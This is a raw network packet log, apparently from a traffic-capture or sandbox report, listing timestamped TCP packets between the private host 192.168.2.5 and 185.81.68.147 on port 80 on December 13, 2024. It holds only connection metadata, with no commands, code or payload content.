                                                                                                                                                                Dec 13, 2024 01:37:36.081789017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081803083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081825972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081845999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081866026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081880093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081898928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081914902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081948042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081962109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081983089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081998110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082020044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082036972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082084894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082110882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082123995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082153082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082184076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082207918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082222939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082278013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082295895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082320929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082335949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082357883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082371950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082387924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082413912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082427979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082448959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082463026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082487106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082503080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082528114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082541943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082564116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082577944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082602978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082617044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082638979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082653046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082675934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082691908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082711935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082726002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082751036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082765102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082789898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082803965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082819939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082900047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082928896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.082952976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083035946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083070040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083127022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083137035 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.083151102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083175898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083184004 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.083194971 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.083199978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083206892 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.083301067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083323956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083354950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083368063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083389997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083404064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083429098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083445072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083628893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083698988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083714962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083738089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083754063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083779097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083797932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083822966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083837032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083859921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083873034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083894014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083906889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083929062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083944082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083967924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.083982944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084002972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084016085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084034920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084048986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084076881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084090948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084111929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084126949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084147930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084171057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084183931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084203959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084223032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084249020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084261894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084291935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084307909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084317923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084394932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084408998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084433079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084446907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084479094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084492922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084518909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084533930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084554911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084578991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084593058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084613085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084628105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084650040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084677935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084884882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084898949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084922075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084935904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084956884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084970951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.084992886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085006952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085020065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085047007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085059881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085079908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085093975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085114956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085128069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085150957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085165977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085187912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085201979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085330963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085350990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085372925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085437059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085464954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085490942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085545063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085568905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085588932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085612059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085683107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085737944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085756063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085784912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085799932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.085838079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086059093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086085081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086100101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086128950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086154938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086179972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086224079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086224079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086241007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086268902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086292982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086307049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086333036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086347103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086381912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086513042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086530924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086622000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086648941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086674929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086760044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086776018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086815119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086853981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086879969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086899042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086925983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086941957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086971045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.086997032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087014914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087042093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087235928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087270021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087296009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087333918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087333918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087363958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087377071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087409019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087421894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087450027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087469101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087495089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087517977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087543964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087558031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087683916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087703943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087729931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087816000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087852001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087871075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087943077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.087982893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088023901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088052988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088054895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088071108 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088077068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088080883 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088128090 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088128090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088145971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088191986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088222980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088222980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088259935 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088296890 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088304996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088346958 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088356018 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088362932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088382959 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088454962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088469982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088510036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088524103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088530064 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088540077 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088548899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088579893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088587999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088591099 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088598967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088608027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088614941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088632107 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088639021 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088661909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088707924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088721037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088756084 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088758945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088792086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088800907 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088807106 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088901997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088916063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.088922977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088932037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088938951 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.088953018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089031935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089051008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089068890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089097023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089150906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089173079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089196920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089222908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089258909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089281082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089297056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089324951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089339018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089366913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089380026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089410067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089426994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.089458942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090379953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090414047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090426922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090461016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090476036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090504885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090523958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090548992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090568066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090593100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090605974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090635061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090651989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090677977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090810061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090836048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090850115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090883017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090960026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.090986013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091001034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091031075 CET4977580192.168.2.5185.81.68.147
